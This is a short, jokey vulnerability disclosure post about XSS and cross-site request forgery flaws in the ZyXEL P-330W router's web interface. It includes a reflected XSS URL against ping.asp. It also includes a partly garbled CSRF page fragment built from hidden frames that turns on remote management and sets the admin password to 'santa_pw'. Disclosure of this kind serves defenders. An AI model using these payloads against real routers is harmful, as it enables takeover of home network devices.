ZyXEL P-330W “Secure Wireless Internet Sharing Router” is vulnerable to multiple XSS and XSRF attacks.
There are a plethora of XSS vulns in the web-based management interface so I'll leave it to you to discover these gifts on your own. Here is a starting point:
http://<router_ip>:<router_port>/ping.asp?pingstr=”><script>alert("M erry Christams")</script>
Additionally, no measures are taken to prevent XSRF so pretty much the whole web-based interface is vulnerable. Here is an example of a web page that if loaded by the victim, turns on remote router management on port 8080 and changes the admin password to "santa_pw":
<html><head><title>Chirstmastime is Here</title></head><body>
submit-url=%2Fremotemgt.asp" width="0" height="0">
&confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0" height="0">
Of course, for any of these attacks to be successful the victim has to be recently logged in to the router.
Hope everyone has a Merry Christmas and please don't think Santa is a lamer because he posted XSS and XSRF (hey, I've been busy delivering toys all night and needed a little pick-me-up).
Merry XSSmas, peace on earth, and this year, give the gift of input validation.